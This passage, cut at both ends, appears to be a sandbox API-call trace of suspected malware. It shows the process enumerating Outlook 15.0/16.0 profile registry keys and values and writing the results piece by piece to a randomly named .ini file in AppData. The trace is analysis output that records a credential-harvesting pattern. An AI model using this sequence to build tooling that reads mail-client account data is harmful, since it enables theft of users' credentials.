StringSid=0xde3b4*="S-1-5-21-1560258661-3990802383-1811730007-1000") returned 1 [0279.656] NtClose (Handle=0x390) returned 0x0 [0279.657] NtCreateKey (in: KeyHandle=0xdea2c, DesiredAccess=0x20219, ObjectAttributes=0xde3b4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea2c*=0x0) returned 0xc0000034 [0279.658] NtCreateKey (in: KeyHandle=0xdea2c, DesiredAccess=0x20219, ObjectAttributes=0xde3ac*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea2c*=0x0) returned 0xc0000034 [0279.658] NtCreateKey (in: KeyHandle=0xdea2c, DesiredAccess=0x20219, ObjectAttributes=0xde3c8*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea2c*=0x390) returned 0x0 [0279.659] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xde2a4, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.659] NtCreateFile (in: FileHandle=0xde2c4, DesiredAccess=0x120089, ObjectAttributes=0xde28c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde2ac, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde2c4*=0x0, IoStatusBlock=0xde2ac*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0279.659] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b3710) returned 1 [0279.659] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xde2bc, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.659] NtCreateFile (in: FileHandle=0xde2dc, DesiredAccess=0x12019f, ObjectAttributes=0xde2a4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde2c4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde2dc*=0x250, IoStatusBlock=0xde2c4*(Status=0x0, Pointer=0x0, Information=0x2)) returned 0x0 [0279.664] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b3248) returned 1 [0279.664] NtQueryInformationFile (in: FileHandle=0x250, IoStatusBlock=0xde2c4, FileInformation=0xde21c, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xde2c4, FileInformation=0xde21c) returned 0x0 [0279.675] NtWriteFile (in: FileHandle=0x250, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xde2c4, Buffer=0x58c868*, Length=0x28, ByteOffset=0xde234*=0, Key=0x0 | out: IoStatusBlock=0xde2c4, Buffer=0x58c868*) returned 0x0 [0279.677] NtClose (Handle=0x250) returned 0x0 [0279.683] NtEnumerateKey (in: KeyHandle=0x390, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x0 [0279.683] NtCreateKey (in: KeyHandle=0xde3d0, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3d0*=0x250) returned 0x0 [0279.683] NtEnumerateKey (in: KeyHandle=0x250, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x8000001a [0279.683] NtClose (Handle=0x250) returned 0x0 [0279.683] NtEnumerateKey (in: KeyHandle=0x390, Index=0x1, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x0 [0279.683] NtCreateKey (in: KeyHandle=0xde3d0, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3d0*=0x250) returned 0x0 [0279.683] NtEnumerateKey (in: KeyHandle=0x250, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x8000001a [0279.683] NtClose (Handle=0x250) returned 0x0 [0279.684] NtEnumerateKey (in: KeyHandle=0x390, Index=0x2, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x0 [0279.684] NtCreateKey (in: KeyHandle=0xde3d0, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\2db91c5fd8470d46b1a5bc5efab4cae7", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3d0*=0x250) returned 0x0 [0279.684] NtEnumerateKey (in: KeyHandle=0x250, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x8000001a [0279.684] NtClose (Handle=0x250) returned 0x0 [0279.684] NtEnumerateKey (in: KeyHandle=0x390, Index=0x3, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x0 [0279.684] NtCreateKey (in: KeyHandle=0xde3d0, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3d0*=0x250) returned 0x0 [0279.684] NtEnumerateKey (in: KeyHandle=0x250, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x8000001a [0279.684] NtClose (Handle=0x250) returned 0x0 [0279.684] NtEnumerateKey (in: KeyHandle=0x390, Index=0x4, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x0 [0279.686] NtCreateKey (in: KeyHandle=0xde3d0, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\6c29d51f56390b45a924b3b787013a66", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3d0*=0x250) returned 0x0 [0279.686] NtEnumerateKey (in: KeyHandle=0x250, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x8000001a [0279.686] NtClose (Handle=0x250) returned 0x0 [0279.687] NtEnumerateKey (in: KeyHandle=0x390, Index=0x5, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x0 [0279.687] NtCreateKey (in: KeyHandle=0xde3d0, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3d0*=0x250) returned 0x0 [0279.687] NtEnumerateKey (in: KeyHandle=0x250, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x8000001a [0279.687] NtClose (Handle=0x250) returned 0x0 [0279.687] NtEnumerateKey (in: KeyHandle=0x390, Index=0x6, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x0 [0279.687] NtCreateKey (in: KeyHandle=0xde3d0, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8763203907727d498bce4b981b157d7b", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3d0*=0x250) returned 0x0 [0279.687] NtEnumerateKey (in: KeyHandle=0x250, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x8000001a [0279.687] NtClose (Handle=0x250) returned 0x0 [0279.687] NtEnumerateKey (in: KeyHandle=0x390, Index=0x7, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x0 [0279.687] NtCreateKey (in: KeyHandle=0xde3d0, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\893893ade607c44aa338ac7df5d6cb42", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3d0*=0x250) returned 0x0 [0279.687] NtEnumerateKey (in: KeyHandle=0x250, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x8000001a [0279.688] NtClose (Handle=0x250) returned 0x0 [0279.688] NtEnumerateKey (in: KeyHandle=0x390, Index=0x8, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x0 [0279.688] NtCreateKey (in: KeyHandle=0xde3d0, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3d0*=0x250) returned 0x0 [0279.688] NtEnumerateKey (in: KeyHandle=0x250, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x8000001a [0279.688] NtClose (Handle=0x250) returned 0x0 [0279.688] NtEnumerateKey (in: KeyHandle=0x390, Index=0x9, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x0 [0279.688] NtCreateKey (in: KeyHandle=0xde3d0, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3d0*=0x250) returned 0x0 [0279.688] NtEnumerateKey (in: KeyHandle=0x250, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x0 [0279.688] NtCreateKey (in: KeyHandle=0xde3cc, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3cc*=0x254) returned 0x0 [0279.693] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0279.693] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.693] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x364, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.694] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b3248) returned 1 [0279.694] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.694] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0xc, ByteOffset=0xdd5fc*=40, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.697] NtClose (Handle=0x364) returned 0x0 [0279.698] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.698] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x364, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.698] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b34f0) returned 1 [0279.698] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.698] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x52, ByteOffset=0xdd5fc*=52, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.698] NtClose (Handle=0x364) returned 0x0 [0279.699] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0x1, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0279.700] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.700] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x364, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.700] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b2e08) returned 1 [0279.700] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.700] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x12, ByteOffset=0xdd5fc*=134, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.700] NtClose (Handle=0x364) returned 0x0 [0279.719] RtlIntegerToChar (in: Value=0xfde888b0, Base=0x0, Length=0x20, String=0xdd6e4 | out: String="4259874992") returned 0x0 [0279.719] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.719] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x364, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.720] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b39b8) returned 1 [0279.720] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.720] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x18, ByteOffset=0xdd5fc*=152, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.720] NtClose (Handle=0x364) returned 0x0 [0279.721] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0x2, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0279.721] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.722] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x364, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.722] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b32d0) returned 1 [0279.722] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.722] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x18, ByteOffset=0xdd5fc*=176, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.722] NtClose (Handle=0x364) returned 0x0 [0279.724] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.724] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x364, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.725] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b3248) returned 1 [0279.725] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.725] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x14, ByteOffset=0xdd5fc*=200, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.725] NtClose (Handle=0x364) returned 0x0 [0279.726] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0x3, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0279.726] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.726] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x364, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.726] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, 